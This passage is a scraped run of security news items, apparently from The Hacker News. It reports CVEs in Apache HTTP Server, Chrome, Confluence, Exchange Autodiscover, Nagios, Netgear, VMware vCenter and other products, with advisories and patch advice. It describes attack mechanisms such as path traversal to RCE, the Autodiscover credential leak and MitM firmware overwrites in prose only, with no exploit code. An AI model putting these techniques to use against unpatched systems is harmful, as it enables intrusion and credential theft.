The flaw — tracked as CVE-2021-41117 (CVSS score: 8.7) — concerns a bug in the pseudo-random number generator used by the library, resulting in the creation of a weaker form of public SSH keys, which, owing to their low entropy — i.e., the measure of randomness — could boost the probability of key duplication.
"This could enable an attacker to decrypt confidential messages or gain unauthorized access to an account belonging to the victim," keypair's maintainer Julian Gruber said in an advisory published Monday. The issue has since been addressed in keypair version 1.0.4 and GitKraken version 8.0.1.
Axosoft engineer Dan Suceava has been credited with discovering the security weakness, while GitHub security engineer Kevin Jones has been acknowledged for identifying the cause and source code location of the bug. As of writing, there's no evidence the flaw was exploited in the wild to compromise accounts.
Affected users are highly recommended to review and "remove all old GitKraken-generated SSH keys stored locally" and "generate new SSH keys using GitKraken 8.0.1, or later, for each of your Git service providers" such as GitHub, GitLab, and Bitbucket, among others.
Update: Along with GitHub, Microsoft Azure DevOps, GitLab, and Atlassian Bitbucket have also initiated mass revocations of SSH keys connected to accounts where the GitKraken client was used to synchronize source code, urging users to revoke the SSH public keys and generate new keys using the updated version of the app.
New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE
Attacks
9.10.21
Vulnerebility
Thehackernews
The Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an "incomplete fix" for an actively exploited path traversal and remote code execution flaw that it patched earlier this week.
CVE-2021-42013, as the new vulnerability is identified as, builds upon CVE-2021-41773, a flaw that impacted Apache web servers running version 2.4.49 and involved a path normalization bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.
Although the flaw was addressed by the maintainers in version 2.4.50, a day
after the patches were released it became known that the weakness could also be
abused to gain remote code execution if the "mod_cgi" module was loaded and the
configuration "require all denied" was absent, prompting Apache to issue another
round of emergency updates.
"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives," the company noted in an advisory. "If files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution."
Apache credited Juan Escobar from Dreamlab Technologies, Fernando Muñoz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said it's "seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation," urging "organizations to patch immediately if they haven't already."
Code Execution Bug Affects Yamale Python Package — Used by Over 200 Projects
9.10.21 Vulnerebility
Thehackernews
A high-severity code injection vulnerability has been disclosed in 23andMe's Yamale, a schema and validator for YAML, that could be trivially exploited by adversaries to execute arbitrary Python code.
The flaw, tracked as CVE-2021-38305 (CVSS score: 7.8), involves manipulating the schema file provided as input to the tool to circumvent protections and achieve code execution. Particularly, the issue resides in the schema parsing function, which allows any input passed to be evaluated and executed, resulting in a scenario where a specially-crafted string within the schema can be abused for the injection of system commands.
Yamale is a Python package that allows developers to validate YAML — a data serialization language often used for writing configuration files — from the command line. The package is used by at least 224 repositories on GitHub.
"This gap allows attackers that can provide an input schema file to perform Python code injection that leads to code execution with the privileges of the Yamale process," JFrog Security CTO Asaf Karas said in an emailed statement to The Hacker News. "We recommend sanitizing any input going to eval() extensively and — preferably — replacing eval() calls with more specific APIs required for your task."
Following responsible disclosure, the issue has been rectified in Yamale version 3.0.8. "This release fixes a bug where a well-formed schema file can execute arbitrary code on the system running Yamale," the maintainers of Yamale noted in the release notes published on August 4.
The findings are the latest in a series of security issues uncovered by JFrog in Python packages. In June 2021, Vdoo disclosed typosquatted packages in the PyPi repository that were found to download and execute third-party cryptominers such as T-Rex, ubqminer, or PhoenixMiner for mining Ethereum and Ubiq on compromised systems.
Subsequently, the JFrog security team discovered eight more malicious Python libraries, which were downloaded no fewer than 30,000 times, that could have been leveraged to execute remote code on the target machine, gather system information, siphon credit card information and passwords auto-saved in Chrome and Edge browsers, and even steal Discord authentication tokens.
"Software package repositories are becoming a popular target for supply chain attacks and there have been malware attacks on popular repositories like npm, PyPI, and RubyGems," the researchers said. "Sometimes malware packages are allowed to be uploaded to the package repository, giving malicious actors the opportunity to use repositories to distribute viruses and launch successful attacks on both developer and CI/CD machines in the pipeline."
Multiple Critical Flaws Discovered in Honeywell Experion PKS and ACE Controllers
9.10.21
Vulnerebility
Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released an advisory regarding multiple security vulnerabilities affecting all versions of Honeywell Experion Process Knowledge System C200, C200E, C300, and ACE controllers that could be exploited to achieve remote code execution and denial-of-service (DoS) conditions.
"A Control Component Library (CCL) may be modified by a bad actor and loaded to a controller such that malicious code is executed by the controller," Honeywell noted in an independent security notification published earlier this February. Credited with discovering and reporting the flaws are Rei Henigman and Nadav Erez of industrial cybersecurity firm Claroty.
Experion Process Knowledge System (PKS) is a distributed control system (DCS)
that's designed to control large industrial processes spanning a variety of
sectors ranging from petrochemical refineries to nuclear power plants where high
reliability and security is important.
The list of three flaws is as follows -
CVE-2021-38397 (CVSS score: 10.0) - Unrestricted Upload of File with Dangerous
Type
CVE-2021-38395 (CVSS score: 9.1) - Improper Neutralization of Special
Elements in Output Used by a Downstream Component
CVE-2021-38399 (CVSS score:
7.5) - Relative Path Traversal
According to Claroty, the issues hinge on the
download code procedure that's essential to program the logic running in the
controller, thus enabling an attacker to mimic the process and upload arbitrary
CLL binary files. "The device then loads the executables without performing
checks or sanitization, giving an attacker the ability to upload executables and
run unauthorized native code remotely without authentication," researchers
Henigman and Erez said.
In a nutshell, successful exploitation of the shortcomings could permit a malicious party to access unauthorized files and directories, and worse, remotely execute arbitrary code and cause a denial-of-service condition. To prevent loading a modified CCL with malicious code to a controller, Honeywell has incorporated additional security enhancements by cryptographically signing each CCL binary that's validated prior to its use.
Users are urged to update or patch as soon as possible in order to mitigate these vulnerabilities fully.
Apache Warns of Zero-Day Exploit in the Wild — Patch Your Web Servers Now!
9.10.21
Vulnerebility
Thehackernews
Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild.
"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday.
"If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts."
The flaw, tracked as CVE-2021-41773, affects only Apache HTTP server version
2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering
and reporting the issue on September 29, 2021.
Source: PT SWARM
Also resolved by Apache is a null pointer dereference
vulnerability observed during processing HTTP/2 requests (CVE-2021-41524), thus
allowing an adversary to perform a denial-of-service (DoS) attack on the server.
The non-profit corporation said the weakness was introduced in version 2.4.49.
Apache users are highly recommended to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw.
Update: Path Traversal Zero-Day in Apache Leads to RCE Attacks
The actively
exploited Apache HTTP server zero-day flaw is far more critical than previously
thought, with new proof-of-concept (PoC) exploits indicating that the
vulnerability goes beyond path traversal to equip attackers with remote code
execution (RCE) abilities. Security researcher Hacker Fantastic, on Twitter,
noted that the vulnerability is "in fact also RCE providing mod-cgi is enabled."
Will Dormann, vulnerability analyst at CERT/CC, corroborated the findings, adding "I was not doing anything clever other than just reproducing essentially the public PoC on Windows when I saw calc.exe spawn."
Update Google Chrome ASAP to Patch 2 New Actively Exploited Zero-Day Flaws
6.10.21
Vulnerebility
Thehackernews
Google on Thursday
pushed urgent security fixes for its Chrome browser, including a pair of new
security weaknesses that the company said are being exploited in the wild,
making them the fourth and fifth actively zero-days plugged this month alone.
The issues, designated as CVE-2021-37975 and CVE-2021-37976, are part of a total of four patches, and concern a use-after-free flaw in V8 JavaScript and WebAssembly engine as well as an information leak in core.
As is usually the case, the tech giant has refrained from sharing any additional details regarding how these zero-day vulnerabilities were used in attacks so as to allow a majority of users to be updated with the patches, but noted that it's aware that "exploits for CVE-2021-37975 and CVE-2021-37976 exist in the wild."
An anonymous researcher has been credited with reporting CVE-2021-37975. The discovery of CVE-2021-37976, on the other hand, involves Clément Lecigne from Google Threat Analysis Group, who was also credited with CVE-2021-37973, another actively exploited use-after-free vulnerability in Chrome's Portals API that was reported last week, raising the possibility that the two flaws may have been stringed together as part of an exploit chain to execute arbitrary code.
With the latest update, Google has addressed a record 14 zero-days in the web browser since the start of the year.
CVE-2021-21148 - Heap buffer overflow in V8
CVE-2021-21166 - Object recycle
issue in audio
CVE-2021-21193 - Use-after-free in Blink
CVE-2021-21206 -
Use-after-free in Blink
CVE-2021-21220 - Insufficient validation of untrusted
input in V8 for x86_64
CVE-2021-21224 - Type confusion in V8
CVE-2021-30551 - Type confusion in V8
CVE-2021-30554 - Use-after-free in
WebGL
CVE-2021-30563 - Type confusion in V8
CVE-2021-30632 - Out of bounds
write in V8
CVE-2021-30633 - Use-after-free in Indexed DB API
CVE-2021-37973 - Use-after-free in Portals
Chrome users are advised to update
to the latest version (94.0.4606.71) for Windows, Mac, and Linux by heading to
Settings > Help > 'About Google Chrome' to mitigate any potential risk of active
exploitation.
Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns
6.10.21
Vulnerebility
Thehackernews
Opportunistic threat
actors have been found actively exploiting a recently disclosed critical
security flaw in Atlassian Confluence deployments across Windows and Linux to
deploy web shells that result in the execution of crypto miners on compromised
systems.
Tracked as CVE-2021-26084 (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.
"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server," researchers from Trend Micro noted in a technical write-up detailing the weakness. "Successful exploitation can result in arbitrary code execution in the security context of the affected server."
The vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.
The in-the-wild attacks come after the U.S. Cyber Command warned of mass exploitation attempts following the vulnerability's public disclosure in late August this year.
In one such attack observed by Trend Micro, z0Miner, a trojan and cryptojacker,
was found updated to leverage the remote code execution (RCE) flaw to distribute
next-stage payloads that act as a channel to maintain persistence and deploy
cryptocurrency mining software on the machines. Imperva, in an independent
analysis, corroborated the findings, uncovering similar intrusion attempts that
were aimed at running the XMRig cryptocurrency miner and other post-exploitation
scripts.
Also detected by Imperva, Juniper, and Lacework is exploitation activity conducted by Muhstik, a China-linked botnet known for its wormlike self-propagating capability to infect Linux servers and IoT devices since at least 2018.
Furthermore, Palo Alto Networks' Unit 42 threat intelligence team said it
identified and prevented attacks that were orchestrated to upload its customers'
password files as well as download malware-laced scripts that dropped a miner
and even open an interactive reverse shell on the machine.
"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain," Imperva researchers said. "RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target."
Urgent Chrome Update Released to Patch Actively Exploited Zero-Day Vulnerability
6.10.21
Vulnerebility
Thehackernews
Google on Friday
rolled out an emergency security patch to its Chrome web browser to address a
security flaw that's known to have an exploit in the wild.
Tracked as CVE-2021-37973, the vulnerability has been described as use after free in Portals API, a web page navigation system that enables a page to show another page as an inset and "perform a seamless transition to a new state, where the formerly-inset page becomes the top-level document."
Clément Lecigne of Google Threat Analysis Group (TAG) has been credited with reporting the flaw. Additional specifics pertaining to the weakness have not been disclosed in light of active exploitation and to allow a majority of the users to apply the patch, but the internet giant said it's "aware that an exploit for CVE-2021-37973 exists in the wild."
The update arrives a day after Apple moved to close an actively exploited security hole in older versions of iOS and macOS (CVE-2021-30869), which the TAG noted as being "used in conjunction with a N-day remote code execution targeting WebKit." With the latest fix, Google has addressed a total of 12 zero-day flaws in Chrome since the start of 2021:
CVE-2021-21148 - Heap buffer overflow in V8
CVE-2021-21166 - Object recycle
issue in audio
CVE-2021-21193 - Use-after-free in Blink
CVE-2021-21206 -
Use-after-free in Blink
CVE-2021-21220 - Insufficient validation of untrusted
input in V8 for x86_64
CVE-2021-21224 - Type confusion in V8
CVE-2021-30551 - Type confusion in V8
CVE-2021-30554 - Use-after-free in
WebGL
CVE-2021-30563 - Type confusion in V8
CVE-2021-30632 - Out of bounds
write in V8
CVE-2021-30633 - Use-after-free in Indexed DB API
Chrome users
are advised to update to the latest version (94.0.4606.61) for Windows, Mac, and
Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk
associated with the flaw.
SonicWall Issues Patches for a New Critical Flaw in SMA 100 Series Devices
6.10.21
Vulnerebility
Thehackernews
Network security
company SonicWall has addressed a critical security vulnerability affecting its
Secure Mobile Access (SMA) 100 series appliances that can permit remote,
unauthenticated attackers to gain administrator access on targeted devices
remotely.
Tracked as CVE-2021-20034, the arbitrary file deletion flaw is rated 9.1 out of a maximum of 10 on the CVSS scoring system, and could allow an adversary to bypass path traversal checks and delete any file, causing the devices to reboot to factory default settings.
"The vulnerability is due to an improper limitation of a file path to a
restricted directory potentially leading to arbitrary file deletion as
'nobody,'" the San Jose-based firm noted in an advisory published Thursday.
"There is no evidence that this vulnerability is being exploited in the wild."
SonicWall credited Wenxu Yin of Alpha Lab, Qihoo 360, with reporting the security shortcoming, which impacts SMA 100 Series — SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v — running the following versions:
9.0.0.10-28sv and earlier
10.2.0.7-34sv and earlier
10.2.1.0-17sv and
earlier
Given that there are no workarounds to remediate the attack vector
and SonicWall devices have become a lucrative target for threat actors to deploy
ransomware in recent months, customers are advised to implement applicable
patches as soon as possible to mitigate any potential exploitation risk.
Cisco Releases Patches 3 New Critical Flaws Affecting IOS XE Software
6.10.21
Vulnerebility
Thehackernews
Networking equipment
maker Cisco Systems has rolled out patches to address three critical security
vulnerabilities in its IOS XE network operating system that remote attackers
could potentially abuse to execute arbitrary code with administrative privileges
and trigger a denial-of-service (DoS) condition on vulnerable devices.
The list of three flaws is as follows -
CVE-2021-34770 (CVSS score: 10.0) - Cisco IOS XE Software for Catalyst 9000
Family Wireless Controllers CAPWAP Remote Code Execution Vulnerability
CVE-2021-34727 (CVSS score: 9.8) - Cisco IOS XE SD-WAN Software Buffer Overflow
Vulnerability
CVE-2021-1619 (CVSS score: 9.8) - Cisco IOS XE Software NETCONF
and RESTCONF Authentication Bypass Vulnerability
The most severe of the
issues is CVE-2021-34770, which Cisco calls a "logic error" that occurs during
the processing of CAPWAP (Control And Provisioning of Wireless Access Points)
packets that enable a central wireless Controller to manage a group of wireless
access points.
"An attacker could exploit this vulnerability by sending a crafted CAPWAP packet to an affected device," the company noted in its advisory. "A successful exploit could allow the attacker to execute arbitrary code with administrative privileges or cause the affected device to crash and reload, resulting in a DoS condition."
CVE-2021-34727, on the other hand, concerns an insufficient bounds check when accepting incoming network traffic to the device, thus allowing an attacker to transmit specially-crafted traffic that could result in the execution of arbitrary code with root-level privileges or cause the device to reload. 1000 Series Integrated Services Routers (ISRs), 4000 Series ISRs, ASR 1000 Series Aggregation Services Routers, and Cloud Services Router 1000V Series that have the SD-WAN feature enabled are impacted by the flaw.
Lastly, CVE-2021-1619 relates to an "uninitialized variable" in the authentication, authorization, and accounting (AAA) function of Cisco IOS XE Software that could permit an authenticated, remote adversary to "install, manipulate, or delete the configuration of a network device or to corrupt memory on the device, resulting a DoS."
Also addressed by Cisco are 15 high-severity vulnerabilities and 15 medium-severity flaws affecting different components of the IOS XE software as well as Cisco Access Points platform and Cisco SD-WAN vManage Software. Users and administrators are recommended to apply the necessary updates to mitigate any potential exploitation risk by malicious actors.
Microsoft Exchange Bug Exposes ~100,000 Windows Domain Credentials
6.10.21
Vulnerebility
Thehackernews
An unpatched design
flaw in the implementation of Microsoft Exchange's Autodiscover protocol has
resulted in the leak of approximately 100,000 login names and passwords for
Windows domains worldwide.
"This is a severe security issue, since if an attacker can control such domains or has the ability to 'sniff' traffic in the same network, they can capture domain credentials in plain text (HTTP basic authentication) that are being transferred over the wire," Guardicore's Amit Serper said in a technical report.
"Moreover, if the attacker has DNS-poisoning capabilities on a large scale (such as a nation-state attacker), they could systematically syphon out leaky passwords through a large-scale DNS poisoning campaign based on these Autodiscover TLDs [top-level domains]."
The Exchange Autodiscover service enables users to configure applications such as Microsoft Outlook with minimal user input, allowing just a combination of email addresses and passwords to be utilized to retrieve other predefined settings required to set up their email clients.
The weakness discovered by Guardicore resides in a specific implementation of
Autodiscover based on the POX (aka "plain old XML") XML protocol that causes the
web requests to Autodiscover domains to be leaked outside of the user's domain
but in the same top-level domain.
In a hypothetical example where a user's email address is "user@example.com," the email client leverages the Autodiscover service to construct a URL to fetch the configuration data using any of the below combinations of the email domain, a subdomain, and a path string, failing which it instantiates a "back-off" algorithm —
https://Autodiscover.example.com/Autodiscover/Autodiscover.xml
https://Autodiscover.example.com/Autodiscover/Autodiscover.xml
https://example.com/Autodiscover/Autodiscover.xml
https://example.com/Autodiscover/Autodiscover.xml
"This 'back-off' mechanism
is the culprit of this leak because it is always trying to resolve the
Autodiscover portion of the domain and it will always try to 'fail up,' so to
speak," Serper explained. "Meaning, the result of the next attempt to build an
Autodiscover URL would be:
'https://Autodiscover.com/Autodiscover/Autodiscover.xml.' This means that
whoever owns Autodiscover.com will receive all of the requests that cannot reach
the original domain."
Armed with this discovery and by registering a number of Autodiscover top-level
domains (e.g., Autodiscover.com[.]br, Autodiscover.com[.]cn, Autodiscover[.]in,
etc.) as honeypots, Guardicore said it was able to access requests to
Autodiscover endpoints from different domains, IP addresses, and clients,
netting 96,671 unique credentials sent from Outlook, mobile email clients, and
other applications interfacing with Microsoft's Exchange server over a
four-month period between April 16, 2021, and August 25, 2021.
The domains of those leaked credentials belonged to several entities from multiple verticals spanning publicly traded corporations in China, investment banks, food manufacturers, power plants, and real estate firms, the Boston-based cybersecurity company noted.
To make matters worse, the researchers developed an "ol' switcheroo" attack that involved sending a request to the client to downgrade to a weaker authentication scheme (i.e., HTTP Basic authentication) in place of secure methods like OAuth or NTLM, prompting the email application to send the domain credentials in cleartext.
To mitigate Autodiscover leaks, it's recommended that Exchange users disable support for basic authentication and add a list of all possible Autodiscover.TLD domains to a local hosts file or firewall configuration to prevent unwanted Autodiscover domain resolution. Software vendors are also advised to avoid implementing a "back-off" procedure that fails upwards to construct unforeseen domains like "Autodiscover."
"Oftentimes, attackers will try to cause users to send them their credentials by applying various techniques, whether technical or through social engineering," Serper said. "However, this incident shows us that passwords can be leaked outside of the organization's perimeter by a protocol that was meant to streamline the IT department's operations with regards to email client configuration without anyone from the IT or security department even being aware of it, which emphasises the importance of proper segmentation and Zero Trust."
A New Bug in Microsoft Windows Could Let Hackers Easily Install a Rootkit
6.10.21
Vulnerebility
Thehackernews
Security researchers
have disclosed an unpatched weakness in Microsoft Windows Platform Binary Table
(WPBT) affecting all Windows-based devices since Windows 8 that could be
potentially exploited to install a rootkit and compromise the integrity of
devices.
"These flaws make every Windows system vulnerable to easily-crafted attacks that install fraudulent vendor-specific tables," researchers from Eclypsium said in a report published on Monday. "These tables can be exploited by attackers with direct physical access, with remote access, or through manufacturer supply chains. More importantly, these motherboard-level flaws can obviate initiatives like Secured-core because of the ubiquitous usage of ACPI [Advanced Configuration and Power Interface] and WPBT."
WPBT, introduced with Windows 8 in 2012, is a feature that enables "boot firmware to provide Windows with a platform binary that the operating system can execute."
In other words, it allows PC manufacturers to point to signed portable executables or other vendor-specific drivers that come as part of the UEFI firmware ROM image in such a manner that it can be loaded into physical memory during Windows initialization and prior to executing any operating system code.
The main objective of WPBT is to allow critical features such as anti-theft
software to persist even in scenarios where the operating system has been
modified, formatted, or reinstalled. But given the functionality's ability to
have such software "stick to the device indefinitely," Microsoft has warned of
potential security risks that could arise from misuse of WPBT, including the
possibility of deploying rootkits on Windows machines.
"Because this feature provides the ability to persistently execute system software in the context of Windows, it becomes critical that WPBT-based solutions are as secure as possible and do not expose Windows users to exploitable conditions," the Windows maker notes in its documentation. "In particular, WPBT solutions must not include malware (i.e., malicious software or unwanted software installed without adequate user consent)."
The vulnerability uncovered by the enterprise firmware security company is rooted in the fact that the WPBT mechanism can accept a signed binary with a revoked or an expired certificate to completely bypass the integrity check, thus permitting an attacker to sign a malicious binary with an already available expired certificate and run arbitrary code with kernel privileges when the device boots up.
In response to the findings, Microsoft has recommended using a Windows Defender Application Control (WDAC) policy to tightly restrict what binaries can be permitted to run on the devices.
The latest disclosure follows a separate set of findings in June 2021, which involved a clutch of four vulnerabilities — collectively called BIOS Disconnect — that could be weaponized to gain remote execution within the firmware of a device during a BIOS update, further highlighting the complexity and challenges involved in securing the boot process.
"This weakness can be potentially exploited via multiple vectors (e.g., physical access, remote, and supply chain) and by multiple techniques (e.g., malicious bootloader, DMA, etc)," the researchers said. "Organizations will need to consider these vectors, and employ a layered approach to security to ensure that all available fixes are applied and identify any potential compromises to devices."
New Nagios Software Bugs Could Let Hackers Take Over IT Infrastructures
6.10.21
Vulnerebility
Thehackernews
As many as 11
security vulnerabilities have been disclosed in Nagios network management
systems, some of which could be chained to achieve pre-authenticated remote code
execution with the highest privileges, as well as lead to credential theft and
phishing attacks.
Industrial cybersecurity firm Claroty, which discovered the flaws, said flaws in tools such as Nagios make them an attractive target owing to their "oversight of core servers, devices, and other critical components in the enterprise network." The issues have since been fixed in updates released in August with Nagios XI 5.8.5 or above, Nagios XI Switch Wizard 2.5.7 or above, Nagios XI Docker Wizard 1.13 or above, and Nagios XI WatchGuard 1.4.8 or above.
"SolarWinds and Kaseya were likely targeted not only because of their large and influential customer bases, but also because of their respective technologies' access to enterprise networks, whether it was managing IT, operational technology (OT), or internet of things (IoT) devices," Claroty's Noam Moshe said in a write-up published Tuesday, noting how the intrusions targeting the IT and network management supply chains emerged as a conduit to compromise thousands of downstream victims.
Nagios Core is a popular open-source network health tool analogous to SolarWinds
Network Performance Monitor (NPM) that's used for keeping tabs on IT
infrastructure for performance issues and sending alerts following the failure
of mission-critical components. Nagios XI, a proprietary web-based platform
built atop Nagios Core, provides organizations with extended insight into their
IT operations with scalable monitoring and a customizable high-level overview of
hosts, services, and network devices.
Chief among the issues are two remote code execution flaws (CVE-2021-37344, CVE-2021-37346) in Nagios XI Switch Wizard and Nagios XI WatchGuard Wizard, an SQL injection vulnerability (CVE-2021-37350) in Nagios XI, and a server-side request forgery (SSRF) affecting Nagios XI Docker Wizard, as well as a post-authenticated RCE in Nagios XI's AutoDiscovery tool (CVE-2021-37343). The complete list of 11 flaws is as follows -
CVE-2021-37343 (CVSS score: 8.8) - A path traversal vulnerability exists in
Nagios XI below version 5.8.5 AutoDiscovery component and could lead to
post-authenticated RCE under the security context of the user running Nagios.
CVE-2021-37344 (CVSS score: 9.8) - Nagios XI Switch Wizard before version 2.5.7
is vulnerable to remote code execution through improper neutralization of
special elements used in an OS Command (OS Command injection).
CVE-2021-37345
(CVSS score: 7.8) - Nagios XI before version 5.8.5 is vulnerable to local
privilege escalation because xi-sys.cfg is being imported from the var directory
for some scripts with elevated permissions.
CVE-2021-37346 (CVSS score: 9.8)
- Nagios XI WatchGuard Wizard before version 1.4.8 is vulnerable to remote code
execution through Improper neutralization of special elements used in an OS
Command (OS Command injection).
CVE-2021-37347 (CVSS score: 7.8) - Nagios XI
before version 5.8.5 is vulnerable to local privilege escalation because
getprofile.sh does not validate the directory name it receives as an argument.
CVE-2021-37348 (CVSS score: 7.5) - Nagios XI before version 5.8.5 is vulnerable
to local file inclusion through an improper limitation of a pathname in
index.php.
CVE-2021-37349 (CVSS score: 7.8) - Nagios XI before version 5.8.5
is vulnerable to local privilege escalation because cleaner.php does not
sanitize input read from the database.
CVE-2021-37350 (CVSS score: 9.8) -
Nagios XI before version 5.8.5 is vulnerable to SQL injection vulnerability in
Bulk Modifications Tool due to improper input sanitization.
CVE-2021-37351
(CVSS score: 5.3) - Nagios XI before version 5.8.5 is vulnerable to insecure
permissions and allows unauthenticated users to access guarded pages through a
crafted HTTP request to the server.
CVE-2021-37352 (CVSS score: 6.1) - An
open redirect vulnerability exists in Nagios XI before version 5.8.5 that could
lead to spoofing. To exploit the vulnerability, an attacker could send a link
that has a specially-crafted URL and convince the user to click the link.
CVE-2021-37353 (CVSS score: 9.8) - Nagios XI Docker Wizard before version 1.1.3
is vulnerable to SSRF due to improper sanitization in table_population.php
In
a nutshell, the flaws could be combined by attackers to drop a web shell or
execute PHP scripts and elevate their privileges to root, thus achieving
arbitrary command execution in the context of the root user. As a
proof-of-concept, Claroty chained CVE-2021-37343 and CVE-2021-37347 to gain a
write-what-where primitive, allowing an attacker to write content to any file in
the system.
"[Network management systems] require extensive trust and access to network components in order to properly monitor network behaviors and performance for failures and poor efficiency," Moshe said.
"They may also extend outside your network through the firewall to attend to remote servers and connections. Therefore, these centralized systems can be a tasty target for attackers who can leverage this type of network hub, and attempt to compromise it in order to access, manipulate, and disrupt other systems."
The disclosure is the second time nearly dozen vulnerabilities have been disclosed in Nagios since the start of the year. Earlier this May, Skylight Cyber revealed 13 security weaknesses in the network monitoring application that could be abused by an adversary to hijack the infrastructure without any operator intervention.
High-Severity RCE Flaw Disclosed in Several Netgear Router Models
6.10.21
Vulnerebility
Thehackernews
Networking equipment company Netgear has released patches to remediate a high-severity remote code execution vulnerability affecting multiple routers that could be exploited by remote attackers to take control of an affected system.
Traced as CVE-2021-40847 (CVSS score: 8.1), the security weakness impacts the following models -
R6400v2 (fixed in firmware version 1.0.4.120)
R6700 (fixed in firmware
version 1.0.2.26)
R6700v3 (fixed in firmware version 1.0.4.120)
R6900
(fixed in firmware version 1.0.2.26)
R6900P (fixed in firmware version
3.3.142_HOTFIX)
R7000 (fixed in firmware version 1.0.11.128)
R7000P (fixed
in firmware version 1.3.3.142_HOTFIX)
R7850 (fixed in firmware version
1.0.5.76)
R7900 (fixed in firmware version 1.0.4.46)
R8000 (fixed in
firmware version 1.0.4.76)
RS400 (fixed in firmware version 1.5.1.80)
According to GRIMM security researcher Adam Nichols, the vulnerability resides
within Circle, a third-party component included in the firmware that offers
parental control features in Netgear devices. Particularly, the issue concerns
the Circle update daemon, which is enabled to run by default even if the router
hasn't been configured to limit daily internet time for websites and apps,
resulting in a scenario that could permit bad actors with network access to gain
remote code execution (RCE) as root via a Man-in-the-Middle (MitM) attack.
This is made possible owing to the manner in which the update daemon (called "circled") connects to Circle and Netgear to fetch updates to the filtering database — which are both unsigned and downloaded using HTTP — thereby making it possible for an interloper to stage an MitM attack and respond to the update request with a specially-crafted compressed database file, extracting which gives the attacker the ability to overwrite executable binaries with malicious code.
"Since this code is run as root on the affected routers, exploiting it to obtain RCE is just as damaging as a RCE vulnerability found in the core Netgear firmware," Nichols said. "This particular vulnerability once again demonstrates the importance of attack surface reduction."
The disclosure comes weeks after Google security engineer Gynvael Coldwind revealed details of three severe security vulnerabilities dubbed Demon's Cries, Draconian Fear, and Seventh Inferno, impacting over a dozen of its smart switches, allowing threat actors to bypass authentication and gain full control of vulnerable devices.
UPDATE: Following the publication of the story, Circle shared the below statement with The Hacker News —
"Circle created software fixes to resolve recently publicized security vulnerabilities for a loader on Netgear routers and has worked with Netgear to ensure that it is available for Netgear customers. Circle recommends that Netgear users ensure that they are using the latest firmware for their Netgear routers. No other Circle customers are impacted by this vulnerability."
VMware Warns of Critical File Upload Vulnerability Affecting vCenter Server
6.10.21 Vulnerebility
Thehackernews
VMware on Tuesday
published a new bulletin warning of as many as 19 vulnerabilities in vCenter
Server and Cloud Foundation appliances that a remote attacker could exploit to
take control of an affected system.
The most urgent among them is an arbitrary file upload vulnerability in the Analytics service (CVE-2021-22005) that impacts vCenter Server 6.7 and 7.0 deployments. "A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file," the company noted, adding "this vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server."
Although VMware has published workarounds for the flaw, the company cautioned that they are "meant to be a temporary solution until updates […] can be deployed."
The complete list of flaws patched by the virtualization services provider is as follows —
CVE-2021-22005 (CVSS score: 9.8) - vCenter Server file upload vulnerability
CVE-2021-21991 (CVSS score: 8.8) - vCenter Server local privilege escalation
vulnerability
CVE-2021-22006 (CVSS score: 8.3) - vCenter Server reverse proxy
bypass vulnerability
CVE-2021-22011 (CVSS score: 8.1) - vCenter server
unauthenticated API endpoint vulnerability
CVE-2021-22015 (CVSS score: 7.8) -
vCenter Server improper permission local privilege escalation vulnerabilities
CVE-2021-22012 (CVSS score: 7.5) - vCenter Server unauthenticated API
information disclosure vulnerability
CVE-2021-22013 (CVSS score: 7.5) -
vCenter Server file path traversal vulnerability
CVE-2021-22016 (CVSS score:
7.5) - vCenter Server reflected XSS vulnerability
CVE-2021-22017 (CVSS score:
7.3) - vCenter Server rhttpproxy bypass vulnerability
CVE-2021-22014 (CVSS
score: 7.2) - vCenter Server authenticated code execution vulnerability
CVE-2021-22018 (CVSS score: 6.5) - vCenter Server file deletion vulnerability
CVE-2021-21992 (CVSS score: 6.5) - vCenter Server XML parsing denial-of-service
vulnerability
CVE-2021-22007 (CVSS score: 5.5) - vCenter Server local
information disclosure vulnerability
CVE-2021-22019 (CVSS score: 5.3) -
vCenter Server denial of service vulnerability
CVE-2021-22009 (CVSS score:
5.3) - vCenter Server VAPI multiple denial of service vulnerabilities
CVE-2021-22010 (CVSS score: 5.3) - vCenter Server VPXD denial of service
vulnerability
CVE-2021-22008 (CVSS score: 5.3) - vCenter Server information
disclosure vulnerability
CVE-2021-22020 (CVSS score: 5.0) - vCenter Server
Analytics service denial-of-service vulnerability
CVE-2021-21993 (CVSS score:
4.3) - vCenter Server SSRF vulnerability
Credited with reporting most of the
